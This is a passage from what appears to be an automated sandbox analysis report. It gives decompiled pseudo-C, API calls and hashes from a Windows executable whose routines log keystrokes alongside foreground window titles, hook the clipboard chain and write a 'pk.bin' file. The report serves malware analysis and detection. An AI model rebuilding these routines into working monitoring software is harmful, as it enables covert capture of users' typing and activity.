CreateCompatibleDC.GDI32(?), ref: 0040E382
#1640.MFC42(00000000), ref: 0040E38C
#5785.MFC42(?,?,00000000), ref: 0040E3A0
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0040E3CC
#5785.MFC42(?,00000000), ref: 0040E3DD
#640.MFC42(?,00000000), ref: 0040E3E9

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #5785$#1640#323#640ClientCompatibleCreateH_prologRect
String ID:
API String ID: 3472376613-0
Opcode ID: c9ef6308fce99b532bd8f276a1ba569f71ff7cd1de4fdcc937aca1f74670c84c
Instruction ID: 441a49bf4daf49adddbb21451af20d37afbf68a81f50fa962d602fdadf0f354f
Opcode Fuzzy Hash: c9ef6308fce99b532bd8f276a1ba569f71ff7cd1de4fdcc937aca1f74670c84c
Instruction Fuzzy Hash: CB21D372900115EBCB21DFA6D8859EFBF75FF88750B10853AF915B3191C738A811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418F4D, Relevance: 13.6, APIs: 9, Instructions: 66
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00418F4D(signed int __eax, void* __ecx) {
				signed int _t36;
				signed int _t37;
				signed int _t38;
				signed int _t39;
				signed int _t40;
				intOrPtr _t42;
				long _t43;
				intOrPtr _t44;
				void* _t61;

				_t61 = __ecx;
				_push(0x4e25);
				L0043DFA6();
				_push(0x8016);
				_t36 = __eax & 0xffffff00 | __eax != 0x00000000;
				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x124) = _t36;
				L0043DFA6();
				_push(0x8017);
				_t37 = _t36 & 0xffffff00 | _t36 != 0x00000000;
				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x129) = _t37;
				L0043DFA6();
				_push(0x8018);
				_t38 = _t37 & 0xffffff00 | _t37 != 0x00000000;
				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x12a) = _t38;
				L0043DFA6();
				_push(0x4e26);
				_t39 = _t38 & 0xffffff00 | _t38 != 0x00000000;
				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x130) = _t39;
				L0043DFA6();
				_push(0x801a);
				_t40 = _t39 & 0xffffff00 | _t39 != 0x00000000;
				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x12c) = _t40;
				L0043DFA6();
				_push(0x442);
				 *((char*)( *((intOrPtr*)(__ecx + 0x64)) + 0x14c)) = _t40 & 0xffffff00 | _t40 != 0x00000000;
				_t42 =  *((intOrPtr*)(__ecx + 0x64));
				 *((char*)(_t42 + 0x12b)) =  *((intOrPtr*)(_t42 + 0x12a));
				L0043E066();
				_t43 = SendMessageA( *(_t42 + 0x20), 0x402, 0, 0);
				_push(0x8019);
				 *(_t61 + 0x68) = _t43;
				L0043DFA6();
				if(_t43 != 0) {
					 *(_t61 + 0x69) =  *(_t61 + 0x69) | 0x00000080;
				}
				_t44 =  *((intOrPtr*)(_t61 + 0x64));
				 *((intOrPtr*)(_t44 + 0x35c)) =  *((intOrPtr*)(_t61 + 0x1c0));
				return _t44;
			}

0x00418f4e
0x00418f50
0x00418f55
0x00418f5d
0x00418f64
0x00418f67
0x00418f6f
0x00418f77
0x00418f7e
0x00418f81
0x00418f89
0x00418f91
0x00418f98
0x00418f9b
0x00418fa3
0x00418fab
0x00418fb2
0x00418fb5
0x00418fbd
0x00418fc5
0x00418fcc
0x00418fcf
0x00418fd7
0x00418fdf
0x00418fe9
0x00418fef
0x00418ff8
0x00419000
0x00419011
0x00419017
0x0041901e
0x00419021
0x00419028
0x0041902a
0x0041902a
0x0041902e
0x00419038
0x0041903e

APIs

#4055.MFC42(00004E25), ref: 00418F55
#4055.MFC42(00008016,00004E25), ref: 00418F6F
#4055.MFC42(00008017,00008016,00004E25), ref: 00418F89
#4055.MFC42(00008018,00008017,00008016,00004E25), ref: 00418FA3
#4055.MFC42(00004E26,00008018,00008017,00008016,00004E25), ref: 00418FBD
#4055.MFC42(0000801A,00004E26,00008018,00008017,00008016,00004E25), ref: 00418FD7
#3092.MFC42(00000442,0000801A,00004E26,00008018,00008017,00008016,00004E25), ref: 00419000
SendMessageA.USER32(?,00000402,00000000,00000000), ref: 00419011
#4055.MFC42(00008019), ref: 00419021

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #4055$#3092MessageSend
String ID:
API String ID: 1389896077-0
Opcode ID: ed28e316254c2d3ca0a6740f5f1b6a1309e6e3d712d02a8bef45529c54cd86c4
Instruction ID: f15c5ed10ad8ced89f658e2c82dbc107253f361899bed9ba0a76bd963c1312df
Opcode Fuzzy Hash: ed28e316254c2d3ca0a6740f5f1b6a1309e6e3d712d02a8bef45529c54cd86c4
Instruction Fuzzy Hash: 7D21D131301B408FE215AB718A56EEA3B962F9CB14F0840AEF6C34F3D3DE54A911CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0041C1B3, Relevance: 13.5, APIs: 9, Instructions: 49
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041C1B3(void* __ecx) {
				int _t19;
				void* _t38;

				E0043E4E0(0x441678, _t38);
				_push(__ecx);
				_push(__ecx);
				_push(1);
				L0043E08A();
				_t19 = strcmp( *(__ecx + 0xd4),  *(__ecx + 0xd0));
				if(_t19 == 0) {
					L0043E03C();
				} else {
					L0043DDD8();
					 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
					_push(_t38 - 0x10);
					L0043E19E();
					_t19 =  *(E00429029(_t38 - 0x14, 0xe02d));
					_push(0x10);
					_push( *((intOrPtr*)(_t38 - 0x10)));
					 *(_t38 - 4) = 1;
					_push(_t19);
					L0043E2EE();
					 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
					L0043DD36();
					 *(_t38 - 4) =  *(_t38 - 4) | 0xffffffff;
					L0043DD36();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t38 - 0xc));
				return _t19;
			}

0x0041c1b8
0x0041c1bd
0x0041c1be
0x0041c1c2
0x0041c1c4
0x0041c1d5
0x0041c1de
0x0041c236
0x0041c1e0
0x0041c1e3
0x0041c1e8
0x0041c1ef
0x0041c1f2
0x0041c207
0x0041c209
0x0041c20b
0x0041c210
0x0041c214
0x0041c215
0x0041c21a
0x0041c221
0x0041c226
0x0041c22d
0x0041c22d
0x0041c23f
0x0041c247

APIs

__EH_prolog.LIBCMT ref: 0041C1B8
#6334.MFC42(00000001), ref: 0041C1C4
strcmp.MSVCRT ref: 0041C1D5
#540.MFC42(00000001), ref: 0041C1E3
#3874.MFC42(?,00000001), ref: 0041C1F2

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

#4224.MFC42(?,?,00000010,?,00000001), ref: 0041C215
#800.MFC42(?,?,00000010,?,00000001), ref: 0041C221
#800.MFC42(?,?,00000010,?,00000001), ref: 0041C22D
#4853.MFC42(00000001), ref: 0041C236

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#1168#3874#4224#4853#537#540#6334H_prologLoadStringstrcmp
String ID:
API String ID: 3304702502-0
Opcode ID: 013ef5ae874f7ed80cfed0f5c3de83375fbfc81e78bcd0a74264556d8ce7bbf8
Instruction ID: ab244a863b63b1987982e45dff40a4763015b14e65b9204dc8ab506e66162651
Opcode Fuzzy Hash: 013ef5ae874f7ed80cfed0f5c3de83375fbfc81e78bcd0a74264556d8ce7bbf8
Instruction Fuzzy Hash: AD01D271E12214ABDB18EBE6D942BEE77B8AF0C314F10145FF012A21D1DFB81E008769

Uniqueness

Uniqueness Score: -1.00%

Function 00420076, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00420076(intOrPtr __ecx, void* __edi, char _a8) {
				void _v263;
				signed char _v264;
				void _v563;
				char _v564;
				void* __ebp;
				int _t33;
				void* _t41;
				struct HWND__* _t48;
				signed int _t50;
				void* _t64;
				intOrPtr _t70;

				_t64 = __edi;
				_t70 = __ecx;
				_t48 = GetForegroundWindow();
				_t33 =  *((intOrPtr*)(_t70 + 0x360)) - 1;
				if(_a8 != 0x20) {
					if(_a8 != 8) {
						goto L7;
					} else {
						if(_t33 != 0xffffffff) {
							_push(1);
							_push(_t33);
							L0043E468();
							return _t33;
						}
					}
				} else {
					if(_t33 != 0xffffffff) {
						if( *((char*)( *((intOrPtr*)(_t70 + 0x35c)) + _t33)) == 0xa) {
							return _t33;
						}
						L7:
						_v564 = _v564 & 0x00000000;
						_push(_t64);
						_t50 = 0x4a;
						memset( &_v563, 0, _t50 << 2);
						_v264 = _v264 & 0x00000000;
						_push(0x40);
						asm("stosw");
						asm("stosb");
						memset( &_v263, 0, 0 << 2);
						asm("stosw");
						asm("stosb");
						_t33 = IsWindow(_t48);
						if(_t33 != 0) {
							GetWindowTextA(_t48,  &_v564, 0x12c);
							_t41 = E00428947(_t48,  &_v264);
							if( *(_t70 + 4) != 0) {
								_t41 = E0042049A(_t70,  &_v564,  &_v264);
								 *(_t70 + 4) =  *(_t70 + 4) & 0x00000000;
							}
							if(_t48 !=  *(_t70 + 0x354) &&  *(_t70 + 4) == 0) {
								if(E0042064C(_t70) != 0) {
									_push(0xffffffff);
									_push(0);
									L0043E456();
								} else {
									E004201B7(_t70);
								}
								_t41 = E0042049A(_t70,  &_v564,  &_v264);
							}
							_push(_a8);
							_push( *((intOrPtr*)(_t70 + 0x360)));
							L0043E462();
							 *(_t70 + 0x354) = _t48;
							return _t41;
						}
					}
				}
				return _t33;
			}

0x00420076
0x00420081
0x00420089
0x00420091
0x00420096
0x004200b6
0x00000000
0x004200b8
0x004200bb
0x004200c1
0x004200c3
0x004200ca
0x00000000
0x004200ca
0x004200bb
0x00420098
0x0042009b
0x004200ab
0x00000000
0x00000000
0x004200d4
0x004200d4
0x004200db
0x004200e0
0x004200e7
0x004200e9
0x004200f0
0x004200f2
0x004200f4
0x004200ff
0x00420101
0x00420103
0x00420104
0x0042010d
0x00420120
0x0042012e
0x00420139
0x0042014b
0x00420150
0x00420150
0x0042015a
0x0042016b
0x00420176
0x00420178
0x00420180
0x0042016d
0x0042016f
0x0042016f
0x00420195
0x00420195
0x0042019a
0x004201a3
0x004201a6
0x004201ab
0x00000000
0x004201ab
0x0042010d
0x0042009b
0x004201b4

APIs

GetForegroundWindow.USER32 ref: 00420083
#5602.MFC42(?,00000001), ref: 004200CA
IsWindow.USER32(00000000), ref: 00420104
GetWindowTextA.USER32 ref: 00420120
#5857.MFC42(?,00000008), ref: 004201A6

Strings

, xrefs: 00420092

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Window$#5602#5857ForegroundText
String ID:
API String ID: 3029010372-3916222277
Opcode ID: d2c68b457d0b8a70c54e20f2bdb6b963fe8fc659ec8eae0106cb14bb8ef50280
Instruction ID: 36bacc79a8265e79c02aa739cb9462023919e80ff369541f1cfa65ba3b461a33
Opcode Fuzzy Hash: d2c68b457d0b8a70c54e20f2bdb6b963fe8fc659ec8eae0106cb14bb8ef50280
Instruction Fuzzy Hash: DD3135717007286BEB319730EC84BFB77E8AB14314F44459FE15A921C2CBBD5A898B19

Uniqueness

Uniqueness Score: -1.00%

Function 00421463, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 57
windowclipboardCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00421463(void* __ecx) {
				void* __esi;
				intOrPtr _t20;
				void* _t24;
				intOrPtr* _t34;
				void* _t39;
				void* _t41;
				char** _t43;

				E0043E4E0(0x442148, _t41);
				_push(__ecx);
				_t39 = __ecx;
				E00422CB5(__ecx);
				_t45 = __ecx;
				if(__ecx != 0) {
					_t20 =  *((intOrPtr*)(__ecx + 0x20));
				} else {
					_t20 = 0;
				}
				E00428327(_t20);
				 *_t43 = "pk.bin";
				_push(0x4558c8);
				_push(_t41 - 0x10);
				 *((char*)(_t39 + 0x17dd)) = 0;
				L0043DE20();
				 *(_t41 - 4) = 0;
				E0040BC5C(_t39 + 0x16b8, _t45,  *((intOrPtr*)(_t41 - 0x10)));
				 *(_t41 - 4) =  *(_t41 - 4) | 0xffffffff;
				L0043DD36();
				_t46 =  *((intOrPtr*)(_t39 + 0x1d38));
				if( *((intOrPtr*)(_t39 + 0x1d38)) != 0) {
					ChangeClipboardChain( *(_t39 + 0x20),  *(_t39 + 0x2738));
				}
				_t24 = E00426D6B(_t46, 0);
				_t47 =  *((intOrPtr*)(_t39 + 0x17dc));
				if( *((intOrPtr*)(_t39 + 0x17dc)) != 0) {
					_t24 = E0042817C(_t39, _t47, 0x4550cc,  *((intOrPtr*)(_t39 + 0x1a14)));
				}
				_t34 =  *((intOrPtr*)(_t39 + 0x60));
				if(_t34 != 0) {
					_t24 =  *((intOrPtr*)( *_t34 + 4))(1);
				}
				PostQuitMessage(0);
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t24;
			}

0x00421468
0x0042146d
0x00421470
0x00421472
0x00421479
0x0042147b
0x00421481
0x0042147d
0x0042147d
0x0042147d
0x00421485
0x0042148a
0x00421494
0x00421499
0x0042149a
0x004214a0
0x004214ad
0x004214b0
0x004214b5
0x004214bc
0x004214c1
0x004214c7
0x004214d2
0x004214d2
0x004214db
0x004214e0
0x004214e6
0x004214f3
0x004214f9
0x004214fa
0x004214ff
0x00421505
0x00421505
0x00421509
0x00421514
0x0042151c

APIs

__EH_prolog.LIBCMT ref: 00421468

Part of subcall function 00422CB5: UnregisterHotKey.USER32(?,00000000,00421477), ref: 00422CC3

#924.MFC42(?,004558C8,?), ref: 004214A0
#800.MFC42(?,004558C8,?), ref: 004214BC
ChangeClipboardChain.USER32(?,?,?,004558C8,?), ref: 004214D2
PostQuitMessage.USER32(00000000), ref: 00421509

Strings

pk.bin, xrefs: 0042148A
H!D, xrefs: 00421463

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800#924ChainChangeClipboardH_prologMessagePostQuitUnregister
String ID: H!D$pk.bin
API String ID: 619069355-2634250293
Opcode ID: 11c00064be92ec980dcf7e3db8baeb522104d2c1ea985a88800be1acb26c5d4a
Instruction ID: dd8ba89de973c5d8fed8d480af102b3a8150279c30f094b963e54c7b5841f83e
Opcode Fuzzy Hash: 11c00064be92ec980dcf7e3db8baeb522104d2c1ea985a88800be1acb26c5d4a
Instruction Fuzzy Hash: 3911C831605754AFC720FBB5E8819AEBBB4FF19304B40496FF05B972A1CB796844CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040925C, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040925C(intOrPtr _a4, struct HWND__* _a8) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t20;

				_v8 = 0;
				_t16 = FindWindowExA(_a8, FindWindowExA(_a8, 0, "Button", "To"), "Static", 0);
				_v8 = _t16;
				GetWindowRect(_t16,  &_v24);
				while(_v24.left < 0x9d && _v24.left > 0xb4) {
					_t20 = FindWindowExA(_a8, _v8, 0, "Static");
					_v8 = _t20;
					GetWindowRect(_t20,  &_v24);
				}
				_push(_v8);
				_push(_a4);
				E0040FEA7();
				return _a4;
			}

0x0040927b
0x0040928a
0x00409297
0x0040929a
0x004092a1
0x004092bc
0x004092c1
0x004092c6
0x004092c6
0x004092ca
0x004092cd
0x004092d0
0x004092de

APIs

FindWindowExA.USER32 ref: 0040927E
FindWindowExA.USER32 ref: 0040928A
GetWindowRect.USER32 ref: 0040929A
FindWindowExA.USER32 ref: 004092BC
GetWindowRect.USER32 ref: 004092C6

Strings

Static, xrefs: 00409281, 004092AF
Button, xrefs: 00409272

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Window$Find$Rect
String ID: Button$Static
API String ID: 2266178948-2498952662
Opcode ID: 00aa0628e058f5a074b55f50cc41ebe79e433bb44d5a730d34a5a205c6c63b09
Instruction ID: 59b331853f046970e1b76411e1733e0e1d07526f63648da2b8d372fca853f5b0
Opcode Fuzzy Hash: 00aa0628e058f5a074b55f50cc41ebe79e433bb44d5a730d34a5a205c6c63b09
Instruction Fuzzy Hash: B101ADB6900208FADF01EFA4CD01EAEBB78EB85315F20806BF800B2192D6785F04DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0042A727, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52
filestringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0042A727(void* _a4) {
				long _v8;
				char _v268;
				void* _t21;

				GetModuleFileNameA(0,  &_v268, 0x104);
				 *(strrchr( &_v268, 0x5c)) = 0;
				SetCurrentDirectoryA( &_v268);
				_t21 = CreateFileA("install.log", 0x80000000, 1, 0, 3, 0, 0);
				if(_t21 != 0xffffffff) {
					if(ReadFile(_t21, _a4, 0x208,  &_v8, 0) != 0) {
						_push(1);
						_pop(0);
					}
					CloseHandle(_t21);
					return 0;
				}
				return 0;
			}

0x0042a741
0x0042a757
0x0042a761
0x0042a77e
0x0042a783
0x0042a79f
0x0042a7a1
0x0042a7a3
0x0042a7a3
0x0042a7a5
0x00000000
0x0042a7ab
0x00000000

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0042A741
strrchr.MSVCRT ref: 0042A750
SetCurrentDirectoryA.KERNEL32(?), ref: 0042A761
CreateFileA.KERNEL32(install.log,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0042A778
ReadFile.KERNEL32(00000000,?,00000208,?,00000000), ref: 0042A797
CloseHandle.KERNEL32(00000000), ref: 0042A7A5

Strings

install.log, xrefs: 0042A773

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: File$CloseCreateCurrentDirectoryHandleModuleNameReadstrrchr
String ID: install.log
API String ID: 3452216514-1352807950
Opcode ID: 3cc14501c575d4bd2e449099727cb6cc2ef7a23007153788673e354b9512efa3
Instruction ID: 0ec86d546ab394b3e87e8aac5c1dc51826991feeaacb956c9b02187b9ab53b65
Opcode Fuzzy Hash: 3cc14501c575d4bd2e449099727cb6cc2ef7a23007153788673e354b9512efa3
Instruction Fuzzy Hash: CE01A77A640218BFF7105BA0BC8DFD7776CEB55355F100172FB41E21C0DAB49E948A69

Uniqueness

Uniqueness Score: -1.00%

Function 00410E77, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00410E77(intOrPtr* __ecx) {
				signed int _t30;
				void* _t36;

				E0043E4E0(0x44052f, _t36);
				_push(__ecx);
				_push(__ecx);
